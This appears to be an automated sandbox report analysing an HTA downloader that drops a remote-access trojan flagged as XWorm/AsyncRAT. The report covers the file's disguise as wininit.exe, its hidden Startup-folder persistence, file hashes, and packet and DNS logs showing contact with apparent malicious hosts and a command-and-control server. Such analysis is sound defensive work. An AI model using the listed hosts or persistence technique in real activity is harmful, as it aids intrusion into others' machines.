                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\wininit.exe (copy)

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):77824
                                                                Entropy (8bit):6.071663313968177
                                                                Encrypted:false
                                                                SSDEEP:1536:uWm/qYqZp1parEfel1tQ7ScRM40bwnssq5lV6R14OdHZtdDS:uiXBQeOcG40bwwPOh9S
                                                                MD5:DC8534F103A3167CEC27B4B01FEA89A4
                                                                SHA1:8B4326CD0F572F0FFFA42B2E94739E9D756BD7F0
                                                                SHA-256:11F65837861268603D19266A62AD2C1876D5CFE33540704860FD7AFE27A476E1
                                                                SHA-512:61A8CE5C6ABD24C50558A8D1708F94275AC1ACBE166D6502F5FB22711A9056D1E95725C66677B631E97AB14F8D0AB6DFC086442302D7990E8DAC5CDBCA3C57B1
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....6g.................$...........C... ...`....@.. ....................................@.................................TC..W....`..F............................................................................ ............... ..H............text....#... ...$.................. ..`.rsrc...F....`.......&..............@..@.reloc..............................@..B.................C......H........m..........&.....................................................(....*.r...p*. .t..*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.rO..p*. ..e.*.r...p*. ....*.r(..p*. .]b.*.rZ..p*. ....*.r...p*. .!..*..((...*.r...p*. (...*.r...p*. . ..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&($...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. w...*.r2..p*. E/..*.rd..p*. E...*.r...p*. ...*.r...p*. .8F.*.r...p*. .(T.*.r,.

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnk

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Dec 4 14:27:36 2024, mtime=Wed Dec 4 14:27:36 2024, atime=Wed Dec 4 14:27:36 2024, length=77824, window=hide
                                                                Category:dropped
                                                                Size (bytes):765
                                                                Entropy (8bit):5.007446697208968
                                                                Encrypted:false
                                                                SSDEEP:12:8gs24fp4088CjrlsY//7LCjAKHHD0pblmV:8ffaf8IZn+AKwlm
                                                                MD5:2889821F21BC49F90CA3790ACD54D41E
                                                                SHA1:E54FF2CCE187569A4767DD15D0A83380249AC2D6
                                                                SHA-256:5CA392792AA4CD3D56759AAD487E9E3B41762E6C223A377667AC2221205F1144
                                                                SHA-512:FE4CD467D1BD6005A1C6A9415559CD37E2C945472DB53EEE8CFC36785E28338DC732900BA8363EEFE257BF11600F1E2FF17D04F7562D984D0A53ACDC903DFC63
                                                                Malicious:false
                                                                Preview:L..................F.... .....:.aF....:.aF....:.aF...0......................v.:..DG..Yr?.D..U..k0.&...&...... M.......#.`F..LIW.aF......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y3{....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y6{..Roaming.@......DWSl.Y6{....C.........................R.o.a.m.i.n.g.....b.2..0...Ys{ .wininit.exe.H......Ys{.Ys{...........................c..w.i.n.i.n.i.t...e.x.e.......Z...............-.......Y...................C:\Users\user\AppData\Roaming\wininit.exe........\.....\.....\.....\.....\.w.i.n.i.n.i.t...e.x.e.`.......X.......134349...........hT..CrF.f4... ...W?T....,...W..hT..CrF.f4... ...W?T....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                C:\Users\user\AppData\Roaming\wininit.exe

                                                                Download File
                                                                Process:C:\Users\user\AppData\Local\Temp\wininit.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):77824
                                                                Entropy (8bit):6.071663313968177
                                                                Encrypted:false
                                                                SSDEEP:1536:uWm/qYqZp1parEfel1tQ7ScRM40bwnssq5lV6R14OdHZtdDS:uiXBQeOcG40bwwPOh9S
                                                                MD5:DC8534F103A3167CEC27B4B01FEA89A4
                                                                SHA1:8B4326CD0F572F0FFFA42B2E94739E9D756BD7F0
                                                                SHA-256:11F65837861268603D19266A62AD2C1876D5CFE33540704860FD7AFE27A476E1
                                                                SHA-512:61A8CE5C6ABD24C50558A8D1708F94275AC1ACBE166D6502F5FB22711A9056D1E95725C66677B631E97AB14F8D0AB6DFC086442302D7990E8DAC5CDBCA3C57B1
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\wininit.exe, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....6g.................$...........C... ...`....@.. ....................................@.................................TC..W....`..F............................................................................ ............... ..H............text....#... ...$.................. ..`.rsrc...F....`.......&..............@..@.reloc..............................@..B.................C......H........m..........&.....................................................(....*.r...p*. .t..*..(....*.r...p*. *p{.*.s.........s.........s.........s.........*.rO..p*. ..e.*.r...p*. ....*.r(..p*. .]b.*.rZ..p*. ....*.r...p*. .!..*..((...*.r...p*. (...*.r...p*. . ..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&($...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. w...*.r2..p*. E/..*.rd..p*. E...*.r...p*. ...*.r...p*. .8F.*.r...p*. .(T.*.r,.

                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                Download File
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):55
                                                                Entropy (8bit):4.306461250274409
                                                                Encrypted:false
                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                Malicious:false
                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                Static File Info

                                                                General

                                                                File type:HTML document, ASCII text, with CRLF line terminators
                                                                Entropy (8bit):5.3027470786596576
                                                                TrID:
                                                                • HyperText Markup Language with DOCTYPE (12503/2) 26.32%
                                                                • HyperText Markup Language (12001/1) 25.26%
                                                                • HyperText Markup Language (12001/1) 25.26%
                                                                • HyperText Markup Language (11001/1) 23.16%
                                                                File name:downloader2.hta
                                                                File size:834 bytes
                                                                MD5:14d473e5742bc69b4360025876bcee11
                                                                SHA1:dd6fe9ffd3454aca4be62bdc4e5801640590dbd4
                                                                SHA256:36e409c298efa59e2062e44b5cefb8b445c18f98c5524de0ace1ccac27c41010
                                                                SHA512:ae5560fc15029643b08ab92f43b4f536e78f14acdcae36a463c577df2bcdd7456773eb3906354516344a65417baea9752682d7360488c223e13f7e600444dfb8
                                                                SSDEEP:24:hMNmMvy4GqptE0ia5ztp8xuY8y+or88+M8E4olEC:ImMqopO0Jfd4+oXt40F
                                                                TLSH:340146AD6CDB8548B371C37512F7E2ADA413E18A60804E0CB3406297FF9A30E4B83383
                                                                File Content Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">.. <head>.. <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />..

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 4, 2024 16:25:55.014853954 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:25:55.134771109 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:55.135023117 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:25:55.135216951 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:25:55.255184889 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:56.585395098 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:56.631896973 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:25:56.752090931 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:56.955986023 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:56.956119061 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:25:56.956177950 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:01.395486116 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:01.515304089 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:01.722651005 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:01.722695112 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:01.722739935 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:04.176188946 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:04.295898914 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:04.500376940 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:04.549417973 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:06.866328001 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:06.986093044 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:07.192107916 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:07.236906052 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:13.505451918 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:13.625098944 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:13.834846020 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:13.877527952 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:14.834525108 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:14.954368114 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:15.160729885 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:15.160865068 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:15.160937071 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:16.160763025 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:16.284117937 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:16.487793922 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:16.488030910 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:16.488091946 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:17.504229069 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:17.624466896 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:17.830887079 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:17.830923080 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:17.830977917 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:18.847929001 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:18.968033075 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:19.174348116 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:19.174371958 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:19.174473047 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:19.178293943 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:19.221268892 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:20.175906897 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:20.295758963 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:20.500931025 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:20.501203060 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:20.501342058 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:20.505012989 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:20.549432993 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:21.394757032 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:21.514431000 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.733676910 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.733843088 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.734052896 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:21.736181974 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.736304998 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.736355066 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:21.744508982 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.745225906 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:21.745290041 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:23.910060883 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.030087948 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.238820076 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.238934040 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.239058971 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.242953062 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.243118048 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.243175030 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.251353025 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.251485109 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.251559973 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.259773970 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.260139942 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.260191917 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.268192053 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.268472910 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.268518925 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:24.276890039 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:24.330704927 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.457900047 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.578587055 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.792186975 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.792318106 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.792380095 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.796577930 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.796933889 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.796991110 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.804650068 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.807398081 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.807456017 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.813184977 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.813635111 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.813694000 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.821505070 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.823331118 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.823386908 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.829950094 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.830351114 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.830425024 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.838449955 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.838808060 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.838864088 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.846792936 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.847265005 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.847335100 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.855204105 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.855873108 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.855928898 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.863543034 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.863718033 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.863769054 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.871922970 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.872039080 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.872102976 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:26.880225897 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:26.924436092 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:27.738203049 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:27.858097076 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.066473961 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.066498041 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.066593885 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.068109035 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.068262100 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.068300962 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.074583054 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.074716091 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.074769974 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.080965042 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.080995083 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.081060886 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.087219000 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.087335110 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.087384939 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.093710899 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.093729973 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.093794107 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.100214005 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.100315094 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.100366116 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.106303930 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.106411934 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.106476068 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.112890959 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.113028049 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.113081932 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.119067907 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.119165897 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.119252920 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.125396967 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.174524069 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:28.258394003 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:26:28.299531937 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:26:32.917192936 CET4976580192.168.2.5208.95.112.1
                                                                Dec 4, 2024 16:26:33.037013054 CET8049765208.95.112.1192.168.2.5
                                                                Dec 4, 2024 16:26:33.037096024 CET4976580192.168.2.5208.95.112.1
                                                                Dec 4, 2024 16:26:33.061484098 CET4976580192.168.2.5208.95.112.1
                                                                Dec 4, 2024 16:26:33.181189060 CET8049765208.95.112.1192.168.2.5
                                                                Dec 4, 2024 16:26:34.135049105 CET8049765208.95.112.1192.168.2.5
                                                                Dec 4, 2024 16:26:34.190001965 CET4976580192.168.2.5208.95.112.1
                                                                Dec 4, 2024 16:27:12.541963100 CET8049765208.95.112.1192.168.2.5
                                                                Dec 4, 2024 16:27:12.542169094 CET4976580192.168.2.5208.95.112.1
                                                                Dec 4, 2024 16:27:38.084537983 CET499065234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:38.204385996 CET523449906116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:38.208293915 CET499065234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:38.249557018 CET499065234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:38.369544029 CET523449906116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:40.776416063 CET523449906116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:40.776494026 CET499065234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:42.315229893 CET499065234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:42.316863060 CET499155234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:42.435132027 CET523449906116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:42.436610937 CET523449915116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:42.436688900 CET499155234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:42.452549934 CET499155234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:42.572585106 CET523449915116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:44.700424910 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:27:44.822268009 CET8049707104.21.80.1192.168.2.5
                                                                Dec 4, 2024 16:27:44.822339058 CET4970780192.168.2.5104.21.80.1
                                                                Dec 4, 2024 16:27:44.929377079 CET523449915116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:44.929436922 CET499155234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:46.408927917 CET499155234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:46.410164118 CET499245234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:46.529125929 CET523449915116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:46.530400038 CET523449924116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:46.530478954 CET499245234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:46.546525955 CET499245234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:46.666410923 CET523449924116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:49.118782997 CET523449924116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:49.118856907 CET499245234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:51.034389019 CET499245234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:51.045299053 CET499345234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:51.279553890 CET523449924116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:51.279571056 CET523449934116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:51.279777050 CET499345234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:51.296997070 CET499345234192.168.2.5116.122.95.113
                                                                Dec 4, 2024 16:27:51.416724920 CET523449934116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:53.757070065 CET523449934116.122.95.113192.168.2.5
                                                                Dec 4, 2024 16:27:53.760309935 CET499345234192.168.2.5116.122.95.113

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 4, 2024 16:25:54.671171904 CET6141553192.168.2.51.1.1.1
                                                                Dec 4, 2024 16:25:55.013636112 CET53614151.1.1.1192.168.2.5
                                                                Dec 4, 2024 16:26:32.769267082 CET5683353192.168.2.51.1.1.1
                                                                Dec 4, 2024 16:26:32.909884930 CET53568331.1.1.1192.168.2.5
                                                                Dec 4, 2024 16:27:37.929594040 CET5750653192.168.2.51.1.1.1
                                                                Dec 4, 2024 16:27:38.079389095 CET53575061.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 4, 2024 16:25:54.671171904 CET192.168.2.51.1.1.10xa57cStandard query (0)2k8u3.orgA (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:26:32.769267082 CET192.168.2.51.1.1.10x24daStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:27:37.929594040 CET192.168.2.51.1.1.10xf74fStandard query (0)ddk.2k8u3.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.80.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.48.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.32.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.64.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.16.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.96.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:25:55.013636112 CET1.1.1.1192.168.2.50xa57cNo error (0)2k8u3.org104.21.112.1A (IP address)IN (0x0001)false
